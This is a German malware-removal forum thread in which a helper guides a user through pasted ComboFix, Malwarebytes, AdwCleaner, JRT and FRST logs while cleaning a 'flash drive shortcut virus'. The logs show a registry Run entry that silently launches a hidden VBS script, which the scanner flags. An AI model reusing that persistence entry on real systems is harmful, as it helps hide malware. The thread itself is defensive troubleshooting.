R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02 1150280 ----a-w- c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-16 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
Toolbar-Locked - (no file)
HKLM-Run-mwlDaemon - c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-16 03:42:26
ComboFix-quarantined-files.txt 2014-04-16 01:42
.
Vor Suchlauf: 15 Verzeichnis(se), 30.584.696.832 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 33.646.391.296 Bytes frei
.
- - End Of File - - 7B368FD47A4B13E2B05BF79FBA8C7373
|
|
16.04.2014, 19:25
| #6 |
| /// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbs Downloade Dir bitte  Malwarebytes Anti-Malware
Downloade Dir bitte  AdwCleaner auf deinen Desktop.
Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
und ein frisches FRST log bitte.
__________________ --> Flash Drive Shortcut Virus wtbchkxbde..vbs |
|
16.04.2014, 23:18
| #7 |
| | Flash Drive Shortcut Virus wtbchkxbde..vbs Ok, alles erledigt mbam hat nichts gefunden mbam.txt: Code:
ATTFilter Malwarebytes Anti-Malware www.malwarebytes.org Suchlauf Datum: 16.04.2014 Suchlauf-Zeit: 23:35:03 Logdatei: mbam.txt Administrator: Ja Version: 2.00.1.1004 Malware Datenbank: v2014.04.16.10 Rootkit Datenbank: v2014.03.27.01 Lizenz: Kostenlos Malware Schutz: Deaktiviert Bösartiger Webseiten Schutz: Deaktiviert Chameleon: Deaktiviert Betriebssystem: Windows 7 CPU: x64 Dateisystem: NTFS Benutzer: Franz Suchlauf-Art: Bedrohungs-Suchlauf Ergebnis: Abgeschlossen Durchsuchte Objekte: 260376 Verstrichene Zeit: 24 Min, 16 Sek Speicher: Aktiviert Autostart: Aktiviert Dateisystem: Aktiviert Archive: Aktiviert Rootkits: Aktiviert Shuriken: Aktiviert PUP: Aktiviert PUM: Aktiviert Prozesse: 0 (No malicious items detected) Module: 0 (No malicious items detected) Registrierungsschlüssel: 0 (No malicious items detected) Registrierungswerte: 0 (No malicious items detected) Registrierungsdaten: 0 (No malicious items detected) Ordner: 0 (No malicious items detected) Dateien: 0 (No malicious items detected) Physische Sektoren: 0 (No malicious items detected) (end) AdwCleaner[S1].txt: Code:
ATTFilter # AdwCleaner v3.023 - Bericht erstellt am 16/04/2014 um 23:59:49
# Aktualisiert 01/04/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Users\Franz\Desktop\Antivir\Trojanerboard\adwcleaner.exe
# Option : Löschen
***** [ Dienste ] *****
***** [ Dateien / Ordner ] *****
***** [ Verknüpfungen ] *****
***** [ Registrierungsdatenbank ] *****
***** [ Browser ] *****
-\\ Internet Explorer v9.0.8112.16476
-\\ Google Chrome v33.0.1750.154
[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]
*************************
AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 17:56:10]
AdwCleaner[R1].txt - [923 octets] - [16/04/2014 23:41:47]
AdwCleaner[S0].txt - [1811 octets] - [11/03/2014 17:57:23]
AdwCleaner[S1].txt - [845 octets] - [16/04/2014 23:59:49]
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [904 octets] ##########
AdwCleaner[S0].txt: Code:
ATTFilter # AdwCleaner v3.021 - Bericht erstellt am 11/03/2014 um 16:57:23
# Aktualisiert 10/03/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Downloads\Chrome\adwcleaner_3.021.exe
# Option : Löschen
***** [ Dienste ] *****
***** [ Dateien / Ordner ] *****
Ordner Gelöscht : C:\ProgramData\Partner
Ordner Gelöscht : C:\ProgramData\Tarma Installer
Ordner Gelöscht : C:\Users\Franz\AppData\Local\Temp\boost_interprocess
***** [ Verknüpfungen ] *****
***** [ Registrierungsdatenbank ] *****
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Schlüssel Gelöscht : HKCU\Software\InstallCore
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Tarma Installer
***** [ Browser ] *****
-\\ Internet Explorer v9.0.8112.16476
-\\ Google Chrome v33.0.1750.146
[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]
*************************
AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 16:56:10]
AdwCleaner[S0].txt - [1663 octets] - [11/03/2014 16:57:23]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1723 octets] ##########
jrt.txt: Code:
ATTFilter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows 7 Home Premium x64
Ran by Franz on 16.04.2014 at 23:46:09,11
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~ Services
~~~ Registry Values
~~~ Registry Keys
Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
~~~ Files
~~~ Folders
~~~ Event Viewer Logs were cleared
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 16.04.2014 at 23:53:19,02
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
neues FRST-Log: FRST.txt: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 00:04:41
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
==================== Registry (Whitelisted) ==================
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
